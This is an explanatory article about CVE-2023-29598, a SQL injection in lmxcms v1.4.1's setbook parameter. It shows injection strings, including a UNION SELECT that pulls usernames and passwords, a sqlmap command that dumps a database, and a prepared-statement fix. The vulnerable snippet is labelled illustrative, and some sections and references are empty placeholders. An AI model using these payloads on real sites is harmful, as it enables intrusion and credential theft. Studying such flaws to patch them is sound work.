CVE-2023-29598 - Exploiting SQL Injection in lmxcms v1.4.1 via the setbook Parameter

In April 2023, a critical SQL injection vulnerability—tracked as CVE-2023-29598—was found in the popular open-source content management system, lmxcms, version 1.4.1. This flaw allows attackers to manipulate SQL queries by sending carefully crafted input through the setbook parameter at index.php. In this article, we'll break down this vulnerability in simple language, show you sample code to exploit it, and provide advice on how to protect your site.

What is SQL Injection?

SQL injection (SQLi) is a web security vulnerability that allows attackers to interfere with the queries an application makes to its database. Successful attacks can read sensitive data, modify databases, and sometimes even execute commands on the server.

Vulnerability Details

Impacted software:  
lmxcms v1.4.1

Vulnerable file:  
index.php

Vulnerable parameter:  
setbook

When the website receives input via the setbook parameter, it fails to properly sanitize it before using it in SQL queries. That means an attacker can craft input that changes the SQL command sent to the database, granting access to sensitive data or allowing additional destructive actions.

Let's look at a code snippet that might be found in an affected version of index.php

// BAD CODE: vulnerable to SQLi
$setbook = $_GET['setbook'];
$sql = "SELECT * FROM books WHERE id = '$setbook'";
$result = mysqli_query($conn, $sql);

If a user visits:  
http://example.com/index.php?setbook=123

The resulting SQL query would be

SELECT * FROM books WHERE id = '123'

But what if an attacker enters this instead

http://example.com/index.php?setbook=123' OR '1'='1

Now, the query becomes

SELECT * FROM books WHERE id = '123' OR '1'='1'

Because '1'='1' is always true, the attacker can retrieve all records from the books table!

Open the vulnerable page:

http://target-site.com/index.php?setbook=1

`

http://target-site.com/index.php?setbook=1'

`

http://target-site.com/index.php?setbook=1' UNION SELECT username, password FROM users-- -

Automating the Attack with sqlmap

sqlmap is a popular open-source tool for automating SQLi attacks.

Example command

sqlmap -u "http://target-site.com/index.php?setbook=1" --risk=3 --level=5 --dump

This tells sqlmap to scan the URL and try to dump the database contents.

Discovery and References

Original Disclosure:  
- CVE-2023-29598 @ NVD
- GitHub Issue/PoC *(if available)*

How to Fix

Developers:

Fixed Code Example

// SAFE CODE: using prepared statements
$setbook = $_GET['setbook'];
$stmt = $conn->prepare("SELECT * FROM books WHERE id = ?");
$stmt->bind_param("s", $setbook);
$stmt->execute();
$result = $stmt->get_result();

Admins:

Final Thoughts

SQL injection is a classic yet highly dangerous bug that still affects modern web apps. CVE-2023-29598 in lmxcms v1.4.1 is a clear example of how a simple coding mistake can put your whole website—and your users—at risk. If you’re using lmxcms, check your version, patch immediately, and review your code for similar security holes.

Further Reading

- OWASP SQL Injection Cheat Sheet
- How to Fix SQL Injection

Timeline

Published on: 04/13/2023 14:15:00 UTC
Last modified on: 04/21/2023 17:07:00 UTC